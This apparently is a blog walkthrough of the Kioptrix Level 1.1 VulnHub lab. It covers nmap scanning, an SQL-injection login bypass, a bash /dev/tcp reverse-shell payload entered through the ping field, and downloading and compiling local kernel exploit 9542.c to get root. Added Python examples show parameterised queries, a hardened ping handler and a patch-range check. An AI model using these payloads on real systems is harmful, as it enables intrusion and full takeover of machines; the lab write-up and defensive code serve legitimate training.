KIOPTRIX: LEVEL 1.1 (#2) Walkthrough Notes


Posted by nathan2009729 on 2022-10-10

The target VM can be downloaded from VulnHub: Kioptrix: Level 1.1 (#2) ~ VulnHub

Before powering on the target, open the CentOs4.5.vmx file and set the relevant network parameters to NAT.

Boot the target in VMware, start your own Kali VM at the same time, and first confirm your own IP.

$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.44.129  netmask 255.255.255.0  broadcast 192.168.44.255
        inet6 fe80::e07:3e48:d243:fe0b  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:05:ac:79  txqueuelen 1000  (Ethernet)
        RX packets 6227  bytes 1176446 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7225  bytes 650900 (635.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Then scan the same subnet with nmap.

$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 08:27 EDT
Nmap scan report for 192.168.44.2
Host is up (0.00046s latency).
Nmap scan report for 192.168.44.129
Host is up (0.000039s latency).
Nmap scan report for 192.168.44.130
Host is up (0.0032s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.08 seconds

Now that we know the target's address is 192.168.44.130, scan its open ports next.

$ nmap -A 192.168.44.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 20:31 CST
Nmap scan report for 192.168.44.130
Host is up (0.68s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 851/udp status
|_ 100024 1 854/tcp status
443/tcp open ssl/https?
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2022-10-07T09:21:45+00:00; -3h09m37s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)

Host script results:
|_clock-skew: -3h09m37s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds
Segmentation fault

Port 80 is open, so point a browser at the target's address to reach the web page.

Next, try SQL injection: in the Username field enter

' or 1 = 1 #-- -

The Password can be anything. After pressing login you land on this page:
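Why the login above accepts that Username is easier to see next to the code pattern that causes it. The following is an added example, not code from the original post or from the Kioptrix VM: it stands in for the target's PHP/MySQL login with Python and an in-memory SQLite table (the user row is constructed), builds the query by string concatenation the way a vulnerable login does, and then shows the parameterised form that a defender would ship instead. Because SQLite has no `#` comment, the demo uses the `-- -` tail of the same payload; on MySQL the `#` in the original payload already starts the comment.

```python
import sqlite3

# Constructed stand-in for the target's users table (not the real credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return conn

def rendered_vulnerable_query(username, password):
    # The vulnerable pattern: user input is pasted into the SQL text, so quotes,
    # OR clauses and comment markers in the input become part of the query.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(conn, username, password):
    row = conn.execute(rendered_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    # Parameterised query: the driver binds the values as data, so the same
    # input is compared literally against the username column and matches nothing.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# The page's payload, in the '--' comment form that SQLite understands.
PAYLOAD = "' or 1 = 1 -- -"

if __name__ == "__main__":
    db = make_db()
    print(rendered_vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterised login returns:", login_safe(db, PAYLOAD, "anything"))
```

Printing the rendered query is the quickest way to answer the "how do I know it is injectable" question for your own code: if the attacker's quote ends up inside the SQL text rather than inside a bound parameter, the query is injectable regardless of what the page looks like.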

It is a page that offers a ping function, which suggests command injection, so let's go straight to trying a reverse shell.

First, on the attacking machine run

nc -lvvp 1234

Then, in the web page's "Ping a Machine on the Network:" field, enter the following command:

;bash -i >& /dev/tcp/172.25.46.188/1234 0>&1

Remember the leading semicolon.

The attacking machine then shows the following:

$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [172.25.46.188] from DESKTOP-NRNV04H.mshome.net [172.25.32.1] 50926
bash: no job control in this shell
bash-3.00$

We now have a shell, but it is not root:

bash-3.00$ whoami
apache
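The ping field works as an injection point because the server hands the field straight to a shell, so the leading `;` ends the ping command and whatever follows runs as the web server user. The block below is an added example, not code from the original post or from the Kioptrix VM: a Python stand-in for that ping handler with the vulnerable pattern next to a hardened one (address whitelist via `ipaddress`, argv list with no shell), plus a small metacharacter check suitable for logging or alerting on such input. The injected sample string is constructed and only echoes a marker; `-W 1` is the iputils option that bounds the wait for a reply.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters that let a field escape the intended command line.
SHELL_META = re.compile(r"[;&|`$()<>\n]")

def build_ping_vulnerable(host):
    # The vulnerable pattern: the form field is pasted into a shell string.
    return "ping -c 1 -W 1 " + host

def run_ping_vulnerable(host):
    # Runs the concatenated string through sh, only to make the failure visible:
    # everything after a ';' in `host` executes as a separate command.
    proc = subprocess.run(["sh", "-c", build_ping_vulnerable(host)],
                          capture_output=True, text=True, timeout=20)
    return proc.stdout

def looks_like_injection(host):
    # Detection helper: flag input that contains shell metacharacters.
    return bool(SHELL_META.search(host))

def validate_host(host):
    # Whitelist: accept only a syntactically valid IPv4/IPv6 address, normalised.
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        return None

def build_ping_safe(host):
    # Hardened pattern: validated address, passed as one argv element, no shell.
    addr = validate_host(host)
    if addr is None:
        return None
    return ["ping", "-c", "1", "-W", "1", addr]

def run_ping_safe(host):
    argv = build_ping_safe(host)
    if argv is None:
        raise ValueError("rejected ping target: %r" % host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=20).returncode

# Constructed sample input: a valid address followed by an extra command.
INJECTED = "127.0.0.1; echo injected"

if __name__ == "__main__":
    print("vulnerable handler output:\n" + run_ping_vulnerable(INJECTED))
    print("hardened handler argv:", build_ping_safe(INJECTED))
    print("flagged for logging:", looks_like_injection(INJECTED))
```

The hardened handler never sees a shell at all, so a semicolon in the field is simply an invalid address and is rejected before anything runs; the `looks_like_injection` check is there so that such rejections can be logged and alerted on rather than silently dropped.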

To escalate privileges we need to find a vulnerability, and for that we first need version numbers. The Apache/2.0.52 that nmap found earlier might also be usable, but let's look for other versions, starting with the Linux kernel version.

bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007

Then the OS version:

bash-3.00$ lsb_release -a
LSB Version:      :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

Then use searchsploit to look for related exploit scripts:

$ searchsploit CentOS 4.5
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) -  | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation         | linux/local/35370.c
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The middle entry, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i, looks usable.
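Matching the kernel string from /proc/version and the lsb_release output against the version range in the searchsploit title is the same check a defender runs across a fleet to find hosts that still need patching. The following is an added example, not code from the original post: it parses the two outputs shown above (embedded here as constants) and compares the kernel against the "2.6 < 2.6.19" range named in the searchsploit entry. The range bounds are taken from that title and are an assumption about what the entry covers.

```python
import re

# The two outputs captured on the target, embedded as sample input.
PROC_VERSION = ("Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) "
                "(gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007")
LSB_RELEASE = """LSB Version:      :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final"""

# Range from the searchsploit title "Linux Kernel 2.6 < 2.6.19": lower inclusive,
# upper exclusive. Assumed to be the entry's coverage; verify against the advisory.
RANGE_9542 = ((2, 6, 0), (2, 6, 19))

def parse_kernel_version(proc_version):
    # Pull "2.6.9-55.EL" apart into a comparable tuple plus the vendor suffix.
    m = re.search(r"Linux version (\d+)\.(\d+)\.(\d+)(?:-(\S+))?", proc_version)
    if not m:
        return None
    return {"version": tuple(int(x) for x in m.group(1, 2, 3)),
            "extra": m.group(4) or ""}

def parse_lsb_release(text):
    # "Key:   value" lines into a dict; the first ':' separates key from value,
    # so the leading ':' in the LSB Version value survives intact.
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields

def in_advisory_range(version, version_range):
    lower, upper = version_range
    return lower <= version < upper

def assess(proc_version, lsb_text, version_range=RANGE_9542):
    kernel = parse_kernel_version(proc_version)
    distro = parse_lsb_release(lsb_text)
    return {
        "kernel": kernel,
        "distributor": distro.get("Distributor ID"),
        "release": distro.get("Release"),
        # True means the upstream version number falls in the range; vendor
        # kernels (the "-55.EL" suffix) backport fixes, so treat it as a lead,
        # not a verdict, and confirm with the distribution's errata.
        "upstream_version_in_range": in_advisory_range(kernel["version"], version_range),
    }

if __name__ == "__main__":
    print(assess(PROC_VERSION, LSB_RELEASE))
```

The caveat in the comment matters in both directions: an enterprise kernel that reports 2.6.9 may already carry the fix, and one that reports a newer number may not, so the version match is what tells you which hosts to check against the vendor's errata list, not which hosts are confirmed exploitable.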

Copy the exploit script 9542.c into a new folder; here I copied it into the target_machine/kipotrix_1.1 folder.

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c target_machine/kipotrix_1.1

Then cd to target_machine/kipotrix_1.1 on the command line and start a web server in that directory:

┌──(kali㉿kali)-[~]
└─$ cd target_machine/kipotrix_1.1                                                                                                                                                     
┌──(kali㉿kali)-[~/target_machine/kipotrix_1.1]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.44.1 - - [09/Oct/2022 07:39:10] "GET / HTTP/1.1" 200 -
192.168.44.1 - - [09/Oct/2022 07:39:11] code 404, message File not found
192.168.44.1 - - [09/Oct/2022 07:39:11] "GET /favicon.ico HTTP/1.1" 404 -
192.168.44.130 - - [09/Oct/2022 07:39:40] "GET /9542.c HTTP/1.0" 200 -
192.168.44.130 - - [09/Oct/2022 07:44:39] "GET /9542.c HTTP/1.0" 200 -

Now the file can be fetched from the attacking machine with wget http://192.168.44.129:8000/9542.c.

bash-3.00$ wget http://192.168.44.129:8000/9542.c
--10:00:51--  http://192.168.44.129:8000/9542.c
           => `9542.c'
Connecting to 192.168.44.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]
9542.c: Permission denied

Cannot write to `9542.c' (Permission denied).

Downloading into the root directory fails with Permission denied, so we need to cd to another directory; check whether there are other hidden directories.

bash-3.00$ cd /tmp
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://192.168.44.129:8000/9542.c
--16:50:35--  http://192.168.44.129:8000/9542.c
           => `9542.c'
Connecting to 192.168.44.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

    0K ..                                                    100%   80.59 MB/s

16:50:35 (80.59 MB/s) - `9542.c' saved [2535/2535] 
bash-3.00$ gcc 9542.c -o 9542
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542
9542.c
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# whoami
root

The exploit script was downloaded and compiled successfully, and running it gives root.

Next, to capture the flag, search for every folder and file whose name contains root:

sh-3.00# updatedb
sh-3.00# locate root
/root
/root/.bashrc
/root/.mysql_history
/root/.bash_profile
/root/.bash_history
/root/.tcshrc
/root/install.log.syslog
/root/.cshrc
/root/install.log
/root/anaconda-ks.cfg
/root/.bash_logout
/dev/root
/var/spool/mail/root
/var/lib/Pegasus/repository/root
/var/lib/Pegasus/repository/root/classes
/var/lib/Pegasus/repository/root/qualifiers
/var/lib/Pegasus/repository/root/instances
/var/lib/Pegasus/repository/root#PG_InterOp
/var/lib/Pegasus/repository/root#PG_InterOp/classes
/var/lib/Pegasus/repository/root#PG_InterOp/classes/CIM_ProductPhysicalComponent.CIM_Component
/var/lib/Pegasus/repository/root#PG_InterOp/classes/CIM_ProcessIndication.CIM_Indication
... (many more)
/var/lib/Pegasus/repository/root#PG_Internal/instances
/sbin/pivot_root
/usr/include/linux/atari_rootsec.h
/usr/sbin/rootflags
/usr/sbin/chroot
/usr/share/doc/pam-0.77/txts/README.pam_rootok
/usr/share/doc/pam-0.77/txts/README.pam_chroot
/usr/share/doc/rpm-4.3.3/buildroot
/usr/share/doc/rpm-devel-4.3.3/apidocs/html/buildroot-source.html
/usr/share/doc/rpm-devel-4.3.3/apidocs/html/buildroot.html
/usr/share/zsh/4.2.0/functions/_fakeroot
/usr/share/locale/ur/LC_MESSAGES/system-config-rootpassword.mo
... (many more)
/usr/share/locale/ru/LC_MESSAGES/system-config-rootpassword.mo
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/rootflags.8.gz
/usr/share/man/man1/gpm-root.1.gz
/usr/share/man/man1/chroot.1.gz
/usr/share/man/man3/selinux_policyroot.3.gz
/usr/share/man/man2/pivot_root.2.gz
/usr/share/man/man2/chroot.2.gz
/usr/share/system-config-rootpassword
/usr/share/system-config-rootpassword/system-config-rootpassword
/usr/share/system-config-rootpassword/system-config-rootpassword.py
/usr/share/system-config-rootpassword/pixmaps
/usr/share/system-config-rootpassword/pixmaps/system-config-rootpassword.png
/usr/share/system-config-rootpassword/passwordDialog.py
/usr/share/applications/system-config-rootpassword.desktop
/usr/share/icons/hicolor/48x48/apps/system-config-rootpassword.png
/usr/share/firstboot/modules/rootpassword.py
/usr/share/umb-scheme/slib/root.scm
/usr/lib/perl5/5.8.5/i386-linux-thread-multi/linux/atari_rootsec.ph
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.py
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.pyc
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.py
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.pyo
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_module.pyo
/usr/lib/python2.3/site-packages/Ft/Server/ThirdParty/pyftpd/auth_chroot_config.pyc
/usr/src/kernels/2.6.9-55.EL-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-i686/include/config/security/rootplug.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-hugemem-i686/include/config/security/rootplug.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/linux/root_dev.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root/hub
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/usb/ehci/root/hub/tt.h
/usr/src/kernels/2.6.9-55.EL-smp-i686/include/config/security/rootplug.h
/usr/bin/gpm-root
/usr/bin/system-config-rootpassword
/etc/selinux/targeted/contexts/users/root
/etc/gpm-root.conf
/etc/pam.d/system-config-rootpassword
/etc/security/console.apps/system-config-rootpassword
/etc/security/chroot.conf
/lib/security/pam_chroot.so
/lib/security/pam_rootok.so

The most suspicious one is /var/spool/mail/root

sh-3.00# cat /var/spool/mail/root
From MAILER-DAEMON@kioptrix.level2  Fri Oct  7 04:57:46 2022
Return-Path: <MAILER-DAEMON@kioptrix.level2>
Received: from localhost (localhost)
        by kioptrix.level2 (8.13.1/8.13.1) id 2978vkJT002499;
        Fri, 7 Oct 2022 04:57:46 -0400
Date: Fri, 7 Oct 2022 04:57:46 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@kioptrix.level2>
Message-Id: <202210070857.2978vkJT002499@kioptrix.level2>
To: postmaster@kioptrix.level2
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="2978vkJT002499.1665133066/kioptrix.level2"
Subject: Postmaster notify: see transcript for details
Auto-Submitted: auto-generated (postmaster-notification)

This is a MIME-encapsulated message

--2978vkJT002499.1665133066/kioptrix.level2

The original message was received at Thu, 9 Feb 2012 22:39:59 -0400
from localhost
with id q1A3dxnO003116

   ----- The following addresses had permanent fatal errors -----
<root@kioptrix.level2>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue

--2978vkJT002499.1665133066/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0400

Final-Recipient: RFC822; root@kioptrix.level2
Action: failed
Status: 4.4.7
Last-Attempt-Date: Fri, 7 Oct 2022 04:57:46 -0400

--2978vkJT002499.1665133066/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
        by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116;
        Thu, 9 Feb 2012 22:39:59 -0500
Date: Thu, 9 Feb 2012 22:39:59 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON>
Message-Id: <201202100339.q1A3dxnO003116@kioptrix.level2>
To: <root@kioptrix.level2>
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="q1A3dxnO003116.1328845199/kioptrix.level2"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--q1A3dxnO003116.1328845199/kioptrix.level2

The original message was received at Mon, 12 Oct 2009 04:02:04 -0500
from localhost.localdomain [127.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<root@kioptrix.level2>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue
451 kioptrix.level2: Name server timeout

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500

Final-Recipient: RFC822; root@kioptrix.level2
Action: failed
Status: 4.4.7
Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <root@kioptrix.level2>
Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1])
        by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890
        for <root@kioptrix.level2>; Mon, 12 Oct 2009 04:02:04 -0400
Received: (from root@localhost)
        by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888
        for root; Mon, 12 Oct 2009 04:02:04 -0400
Date: Mon, 12 Oct 2009 04:02:04 -0400
From: root <root@kioptrix.level2>
Message-Id: <200910120802.n9C824Nj003888@kioptrix.level2>
To: root@kioptrix.level2
Subject: LogWatch for kioptrix.level2


 ################### LogWatch 5.2.2 (06/23/04) ####################
       Processing Initiated: Mon Oct 12 04:02:04 2009
       Date Range Processed: yesterday
     Detail Level of Output: 0
          Logfiles for Host: kioptrix.level2
 ################################################################

 --------------------- SSHD Begin ------------------------

SSHD Killed: 1 Time(s)

 ---------------------- SSHD End -------------------------



------------------ Disk Space --------------------

/dev/mapper/VolGroup00-LogVol00
                      3.3G  1.5G  1.7G  47% /
/dev/hda1              99M  9.3M   85M  10% /boot


 ###################### LogWatch End #########################


--q1A3dxnO003116.1328845199/kioptrix.level2--


--2978vkJT002499.1665133066/kioptrix.level2--

Remaining question: how do you determine that a web page has SQL injection and command injection vulnerabilities? And if it does, which statements should be used?


#attack #Vulnhub






